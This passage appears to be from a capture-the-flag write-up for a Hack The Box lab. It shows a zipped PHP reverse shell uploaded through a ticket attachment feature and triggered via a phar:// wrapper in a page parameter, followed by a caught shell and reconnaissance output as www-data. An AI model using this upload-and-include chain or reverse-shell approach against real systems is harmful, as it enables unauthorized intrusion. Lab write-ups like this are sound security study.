Phar
The target web application offers a file upload feature in creating tickets with a limit to the zip extension only. While .phar files are essentially PHP archive files, PHAR can be used as a protocol
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ zip payload.zip revshell.php
adding: revshell.php (deflated 72%)Archiving the PHP reverse shell payload
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -s 'http://itrc.ssg.htb/index.php?page=phar:///var/www/itrc/uploads/60eac432b5847866b5b7afde5c7dfb5f4bba03e9.zip/revshell'┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.14.172] from (UNKNOWN) [10.10.11.27] 32874
SOCKET: Shell has connected! PID: 92839
whoami
www-data
hostname
itrc
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.223.0.3 netmask 255.255.0.0 broadcast 172.223.255.255
ether 02:42:ac:df:00:03 txqueuelen 0 (Ethernet)
RX packets 17529570 bytes 1703751675 (1.5 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 14182281 bytes 2671249792 (2.4 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 91226 bytes 9779422 (9.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 91226 bytes 9779422 (9.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Initial Foothold established to the target environment as the www-data account
It appears to be a Docker container